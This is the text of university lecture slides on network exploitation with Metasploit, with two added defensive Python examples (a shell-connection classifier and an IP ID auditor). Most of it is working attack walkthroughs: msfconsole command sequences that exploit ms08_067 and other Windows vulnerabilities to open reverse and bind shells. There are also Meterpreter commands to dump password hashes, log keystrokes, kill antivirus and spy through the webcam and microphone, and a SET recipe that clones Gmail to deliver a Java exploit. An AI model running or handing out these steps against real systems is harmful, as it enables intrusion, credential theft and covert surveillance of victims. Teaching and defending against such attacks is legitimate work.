Network Security
Metasploit
Osman SALEM
Maître de Conférences
Exploitation
Using any unauthorized tools will get you fired/arrested/deported/smited by God, etc...
This course is not intended to make you a cracker
Just a small hacker, to understand the importance of patches
You alone are responsible for any misuse of these tools
Exploitation
Once on a network, how do you find vulnerabilities?
Vulnerability scanner tools
How do you get access?
System penetration through vulnerability exploitation
Target weak servers and test boxes first
Less likely to be patched
Get access to:
Steal passwords
Set up relays
etc.
So, what is the Metasploit Framework?
What is it capable of providing?
Many Attack Vectors!
Gaining access to a secured system is a difficult task that requires skill and maybe … luck
However, the most dangerous and very effective attacks used by malicious users today are software exploitation attacks!
Social engineering
Software exploitation attacks can be used to gain access to unauthorized systems:
Installation of malicious software (spyware, viruses, trojans, adware, etc.)
Understanding S.E. Attacks.
First, let’s understand the basics
“The word vulnerability, in computer security, refers to a weakness in a
system allowing an attacker to violate the confidentiality, integrity,
availability, access control, consistency or audit mechanisms of the system
or the data and applications it hosts”
To software developers, a bug is synonymous with a vulnerability
Ex: errors in a program’s source code or flawed program design
Buffer overflows
Memory leaks
Deadlocks
Arithmetic overflow
Accessing protected memory (Access Violation)
etc.
Exploitation – Exploits
Regardless of the type of software bug we are speaking of, an exploit:
Triggers an unexpected condition in the program
generating an event that the program is not designed to recover from successfully
Redirects execution in a controlled way to run the payload
The payload is a sequence of code that is executed when the vulnerability is triggered
To make things clear, an exploit is really broken up into two parts:
EXPLOIT = Vulnerability + Payload
Understanding Payloads
The payload is usually written in Assembly Language
Platform and OS dependent: a Win32 payload will not work on Linux (even if we are exploiting the same bug)
Different payload types exist and they accomplish different tasks:
exec: execute a command or program on the remote system
download_exec: download a file from a URL and execute it
upload_exec: upload a local file and execute it
adduser: add a user to the system accounts
The most common payload is a shell: /bin/sh on Unix, the command prompt cmd.exe on Windows
Two different types of shell payloads: bind shells and reverse shells
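Added example (not from the slides): a small Python detector that reads connection records shaped like the "src:port -> dst:port" pairs msfconsole prints when a session opens, and labels each one bind-shell-like or reverse-shell-like from the defender's side, since the two shell types differ only in who initiates the connection. The sample records, the monitored-host set and the handler-port watch-list are constructed assumptions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample records (not from the slides), shaped like the "src:port -> dst:port"
# pairs msfconsole prints when a session opens. 192.168.0.7 plays the monitored host.
SAMPLE_LOG = """\
192.168.0.3:41289 -> 192.168.0.7:4444
192.168.0.7:1029 -> 192.168.0.3:4444
192.168.0.7:52010 -> 192.168.0.20:443
192.168.0.5:33000 -> 192.168.0.7:445
"""

# Assumed watch-list: the default handler port seen in the slides' transcripts. An
# attacker can change LPORT, so this is a starting heuristic, not a complete rule.
HANDLER_PORTS = {4444}

LINE_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$")

@dataclass
class Verdict:
    src: str
    dst: str
    dport: int
    kind: str  # "bind-like", "reverse-like" or "benign"

def classify(line: str, monitored: set[str]) -> Verdict | None:
    """Label one record from the point of view of the monitored assets."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, dst, dport = m.group(1), m.group(3), int(m.group(4))
    kind = "benign"
    if dport in HANDLER_PORTS:
        if dst in monitored:
            # Something connected *to* a handler port on our host: bind shell shape
            # (the payload opened a listener on the victim).
            kind = "bind-like"
        elif src in monitored:
            # Our host dialled *out* to a handler port: reverse shell shape
            # (the payload calls back to LHOST:LPORT).
            kind = "reverse-like"
    return Verdict(src, dst, dport, kind)

def scan_log(text: str, monitored: set[str]) -> list[Verdict]:
    """Verdicts for every parseable record; lines that do not match are skipped."""
    verdicts = (classify(ln, monitored) for ln in text.splitlines() if ln.strip())
    return [v for v in verdicts if v is not None]

if __name__ == "__main__":
    for v in scan_log(SAMPLE_LOG, {"192.168.0.7"}):
        print(f"{v.src} -> {v.dst}:{v.dport}  {v.kind}")
```

Port-based matching only catches default configurations; in practice pair it with an inventory of which hosts are expected to accept or initiate connections at all.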
Auxiliaries & encoders
Auxiliaries: scanning, sniffing, fingerprinting, etc.
Encoders: evade detection by antivirus, firewall, IDS, IPS, etc.
Encode the payload during the penetration operation
Metasploit Framework
What is the Metasploit Framework? “The Metasploit Framework is a platform for writing, testing, and using exploit code.”
Provides a simplified method for launching dangerous attacks
Set of exploits to launch against a box
Potentially own the box
Build a real exploit for your own purposes
General interface for testing & writing exploit
Will not make you a cracker
MSFConsole
The most efficient, powerful, all-in-one centralized frontend interface for penetration testers to use Metasploit
$ cd /pentest/exploits/framework/
$ ./msfconsole
msf > help
msf > show exploits
msf > show payloads
msf > show encoders
msf > show -h
MSFConsole
$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:41289 -> 192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Exploitation – Metasploit
Metasploit:
getting a shell
Exploitation – Meterpreter
Can take many actions:
Upload/download files
Read/write to registry
Change file access times
Execute programs
Exploitation – Exploits
Modern exploits work best
ms08-067 – October 2008 (1/3 of machines still vulnerable)
ms03-026 – September 2003
Used by MS Blaster
ms04-011 – April 2004
Used by Sasser
MSFConsole
$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Try the payload: set PAYLOAD windows/vncinject/reverse_tcp
then set RHOST and set LHOST
MSFConsole
$ ./msfconsole
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show options
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST 192.168.1.10
msf exploit(ms03_026_dcom) > set RHOST 192.168.1.17
msf exploit(ms03_026_dcom) > exploit
MSFConsole
$ ./msfconsole
msf > use exploit/windows/browser/ms10_046_icon_dllloader
msf exploit(ms10_046_icon_dllloader) > show options
msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_046_icon_dllloader) > set LHOST 192.168.1.10
msf exploit(ms10_046_icon_dllloader) > exploit
In the victim's browser, enter the IP address of the attacker
MSFConsole
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show payloads
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP]
msf exploit(ms10_061_spoolss) > exploit
Information gathering
nslookup www.mi.parisdescartes.fr
nslookup
set type=mx
mi.parisdescartes.fr
whois -h whois.ripe.net 193.48.xx.YY
Netcraft: http://searchdns.netcraft.com
nmap -sS -Pn 192.168.1.18
nmap -sS -Pn -A 192.168.1.18
TCP idle scan
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
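Added example (not from the slides, and not Metasploit's or nmap's own code): the IP ID sequence classification that the ipidseq module performs on each host it probes, written so an administrator can audit captured IP ID values from their own hosts and fix the ones whose counter is predictable, which is the property an idle scan depends on. The sample values, host names and thresholds are this example's own assumptions.

```python
from __future__ import annotations

# Constructed IP ID samples (not from the slides): the 16-bit IP ID of consecutive
# packets received from one host. Host names are placeholders.
SAMPLES = {
    "hostA": [0x1a2b, 0x1a2c, 0x1a2d, 0x1a2e, 0x1a2f, 0x1a30],  # counts up by one
    "hostB": [0x2b1a, 0x2c1a, 0x2d1a, 0x2e1a, 0x2f1a, 0x301a],  # counts up, bytes swapped
    "hostC": [0, 0, 0, 0, 0, 0],                                 # never sets the field
    "hostD": [0x7f3e, 0x02a1, 0xc4d0, 0x3b19, 0x9e87, 0x5510],  # unpredictable
}

# Assumed thresholds chosen for this example; they mirror the classes ipidseq and
# nmap report but are not their exact constants.
INCREMENTAL_MAX_STEP = 6
POSITIVE_MAX_STEP = 1000

def swap16(v: int) -> int:
    """Byte-swap a 16-bit value (some stacks emit the counter little-endian)."""
    return ((v & 0xFF) << 8) | (v >> 8)

def steps(ids: list[int]) -> list[int]:
    """Differences between consecutive IDs, modulo 2**16 so wrap-around still counts."""
    return [(b - a) % 0x10000 for a, b in zip(ids, ids[1:])]

def classify_ipid(ids: list[int]) -> str:
    if len(ids) < 3:
        return "Unknown"  # too few samples to judge
    if all(i == 0 for i in ids):
        return "All zeros"  # no counter at all: useless to an idle scan
    d = steps(ids)
    if all(0 < s < INCREMENTAL_MAX_STEP for s in d):
        return "Incremental"  # predictable: this host could be abused as a zombie
    if all(0 < s < INCREMENTAL_MAX_STEP for s in steps([swap16(i) for i in ids])):
        return "Broken little-endian incremental"  # same weakness, other byte order
    if all(0 < s < POSITIVE_MAX_STEP for s in d):
        return "Random positive increments"  # partly predictable
    return "Randomized"  # unpredictable: an idle scan cannot use this host

def audit(samples: dict[str, list[int]]) -> dict[str, str]:
    """Class per host; the two 'incremental' classes are the ones to fix (randomize IP ID)."""
    return {host: classify_ipid(ids) for host, ids in samples.items()}

if __name__ == "__main__":
    for host, cls in audit(SAMPLES).items():
        print(f"{host}: {cls}")
```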
Exploitation – Meterpreter
Meterpreter
A Metasploit payload
Injects itself into the target process as a .dll
To cover your tracks
MSFConsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
...
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1029)
meterpreter > help
meterpreter > getuid
meterpreter > sysinfo
MSFConsole
meterpreter > run hashdump
meterpreter > ps
meterpreter > migrate 3172
meterpreter > getpid
meterpreter > getuid
meterpreter > use priv (to enable keystroke capture, you must load the priv extension)
meterpreter > keyscan_start (start keystroke capture)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > screenshot
meterpreter > shell
meterpreter > run vnc
meterpreter > run killav (to kill the antivirus)
Exploitation – Meterpreter
Acts as ordinary payload
SET : Social-Engineer Toolkit
SET uses Metasploit
There is a "social engineering" aspect in most hacking
Tricking a user into making a mistake that lets you in
Clicking a link
Ignoring an error message
Opening an attachment
etc.
Today's Attack
Target: Win 7
Vuln: Java 0-Day
Diagram: the target, using Gmail, and the attacker's evil web server hosting a cloned Gmail page with Java exploit code added to the web page
Social Engineering
http://www.secmaniac.com/blog/2011/01/01/bypass-windows-uac/
Commands
cd /pentest/exploits/SET
./set
Enter option 1: Social Engineering Attacks
Enter option 2: Website Attack Vectors
Enter option 1: The Java Attack Method
Enter option 2: Site Cloner
Enter url https://gmail.com
It asks you "What payload do you want to generate:" and lists 11 choices
Press Enter for default: 2. (Windows Reverse_TCP Meterpreter)
It shows a list of 16 encodings to try and bypass AV. Press Enter for default
It asks you to "Enter the PORT of the listener (enter for default):" Press Enter for default
It asks you whether you want to create a Linux/OSX reverse_tcp payload. Enter no
It now shows blue text saying: [*] Launching MSF Listener... [*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message: msf exploit(handler) >
GAME OVER
The target is now owned. We can
Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take photo
Steal password hashes
etc.
Fun & Games
To remotely control the target: sessions -i 1
Commands to try: screenshot
keyscan_start
keyscan_stop
record_mic 10
webcam_list
webcam_snap 1
The Usual Stuff
This stuff is all helpful
Get Antivirus
Install patches (when they exist)
Keep image-based backups so you can recover after an infection
But none of it can really save you
Attack > Defense
Even corporate desktop computers are infected
The Chinese got into Google and >30 other huge companies last year
Don't imagine you are immune